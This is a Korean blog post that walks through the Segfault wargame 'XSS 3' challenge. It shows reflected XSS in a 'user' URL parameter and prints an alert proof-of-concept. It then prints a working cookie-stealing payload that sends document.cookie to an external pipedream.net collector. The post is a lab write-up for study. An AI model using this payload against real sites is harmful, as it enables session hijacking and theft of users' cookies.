<Segfault> 워게임 문제풀이 [XSS 3]

2024. 7. 1. 18:54·워게임 문제풀이/Segfault

목표: 관리자의 쿠키를 탈취하라!


 

XSS 3 사이트에 들어왔습니다.

일단 차근차근 마이페이지부터 들어가보겠습니다.

 

 

 


 

주소창의 user 라는 변수를 GET 방식으로 보내주는것을 보고 변수값을 james 라고 바꿔서 보내주자 입력한 값에 따라 페이지에 출력되는 값이 바뀌는것을 확인하였습니다.

 

링크를 통해 페이지 출력을 바꾼다? => Reflectd XSS 

 

http://ctf.segfaulthub.com:4343/xss_3/mypage.php?user=test http://ctf.segfaulthub.com:4343/xss_3/mypage.php?user=james

 


<POC 코드 실행을 위한 Burp Suite 분석>

보시면 james 라는 값이  응답에 placeholder="james" 라는 코드안에 들어가는것을 보실수 있습니다.

 

 

 

그러면 user="><script>alert(1)</script> // 이라고 해서 스크립트가 삽입되는지 확인해보겠습니다.

 


 

입력값 : user="><script>alert(1)</script> //

 

의도한 대로 스크립트 코드가 잘 삽입되어 POC 코드가 동작한 것을 확인할 수 있습니다.

이제 쿠키탈취 코드를 삽입해주겠습니다.

 


입력값: user="><script>var%20data=document.cookie;%20var%20i=new%20Image();%20i.src="https://encxlimxsq6z.x.pipedream.net?cookie="%2Bdata;</script>//

 

쿠키전달 사이트

 

 

값이 무사히 잘 들어갔고 쿠키값 또한 잘 전달되는 것으로 확인되었습니다.

그러면 관리자 컴퓨터가 제가 보내준 링크로 접속을 했다고 가정하고 쿠키가 들어오는지 확인하겠습니다.

 


 

관리자의 컴퓨터로 제가 보내준 링크의 접속을 해봅니다.


 

 

쿠키값이었던 FLAG가 잘 전달된 것을 확인하실수 있습니다! 

 


 

 

 

긴 글 읽어주셔서 감사합니다!

'워게임 문제풀이 > Segfault' 카테고리의 다른 글

<Segfault> 워게임 문제풀이 [XSS 5](feat.자기반성)  (0) 2024.07.01
<Segfault> 워게임 문제풀이 [XSS 4]  (0) 2024.07.01
<Segfault> 워게임 문제풀이 [XSS 2]  (0) 2024.06.30
<Segfault> 워게임 문제풀이 [XSS 1]  (0) 2024.06.26
<Segfault> 워게임 문제풀이 [7편]-Blind SQL Injection  (1) 2024.05.31
'워게임 문제풀이/Segfault' 카테고리의 다른 글
  • <Segfault> 워게임 문제풀이 [XSS 5](feat.자기반성)
  • <Segfault> 워게임 문제풀이 [XSS 4]
  • <Segfault> 워게임 문제풀이 [XSS 2]
  • <Segfault> 워게임 문제풀이 [XSS 1]
무너박사
무너박사
IT 보안 블로그 입니다. 제가 작성하는 블로그가 누군가의 공부에 조금이라도 도움이 되길 바라며 작성하였습니다.
  • 무너박사
    무너박사의 연구일지
    무너박사
  • 전체
    오늘
    어제
    • 분류 전체보기 (104)
      • WEB 지식 (3)
      • 웹해킹 (13)
      • 웹개발(PHP-Mysql) (12)
      • 웹개발(JSP-Oracle) (2)
      • 워게임 문제풀이 (19)
        • Segfault (17)
        • Dreamhack (2)
      • SQL (3)
      • Python (2)
      • AI (1)
        • LLM(Large Language Model) (1)
      • Kail Linux (3)
      • 잡다한 지식 (2)
      • 모바일 앱개발(Kotlin-PHP-Mysql) (13)
      • 모바일 앱해킹(Android) (31)
        • Frida Lab (2)
        • Android DIVA (8)
        • Insecure Bank (20)
      • 안드로이드 위협 탐지 및 우회 (0)
        • 루팅 탐지 & 우회 (0)
        • 디버깅 탐지 & 우회 (0)
        • 에뮬레이터 탐지 & 우회 (0)
        • Frida 탐지 & 우회 (0)
  • 블로그 메뉴

    • 링크

    • 공지사항

    • 인기 글

    • 태그

      normaltic
      android diva
      해킹
      dom based xss
      Koltin
      Kotlin
      인시큐어 뱅크
      앱해킹
      워게임
      모바일앱개발
      안드로이드 스튜디오
      insecure bank
      php
      mobile diva
      시스템해킹
      리패키징
      웹해킹
      취업반 6기
      sql injection
      칼리리눅스
      MySQL
      모바일 앱해킹
      XSS
      취업반
      취업반6기
      모바일 앱개발
      인시큐어뱅크
      Android Studio
      Blind sql injection
      모의해킹
    • 최근 댓글

    • 최근 글

    • hELLO· Designed By정상우.v4.10.3
    무너박사
    <Segfault> 워게임 문제풀이 [XSS 3]
    상단으로

    티스토리툴바